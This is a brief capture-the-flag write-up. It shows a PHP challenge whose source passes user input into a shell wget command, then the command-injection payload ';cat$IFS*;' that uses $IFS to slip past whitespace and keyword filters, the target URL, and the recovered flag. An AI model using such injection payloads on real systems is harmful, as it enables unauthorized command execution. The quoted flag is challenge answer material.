Soruce code everywhere!
Flag format: CTF{}
CTF{a9b6b13862f0a8d1312d777a91a596eba7cb010f}
Combat the blacklisted words using $IFS and * for cat.
After connecting to the webserver, we have a comment that suggests we go to /?source.
We see this code:
<?php
error_reporting(0);
(isset($_GET['source']) AND show_source(__FILE__) AND die());
if(isset($_REQUEST['p'])){
$p = preg_replace('/[^\\x21-\\x7e]/','', $_REQUEST['p']);
$p = str_replace("flag", "", $p);
$p = substr($p,0,9);
system("wget -qO - " . $p . " 2>&1");
}
?>
We have 10 characters to get the flag.
My payload was: ;cat$IFS*;.
$IFS was needed because the server gets rid of the spacebar. We need ; at the end to stop the 2>&1.
URL: [http://34.141.72.235:32228/?p=;cat$IFS*;](http://34.141.72.235:32228/?p=;cat$IFS*;)
Afterwards, the flag is in the comments, if we view the source.
?php
//CTF{a9b6b13862f0a8d1312d777a91a596eba7cb010f}
?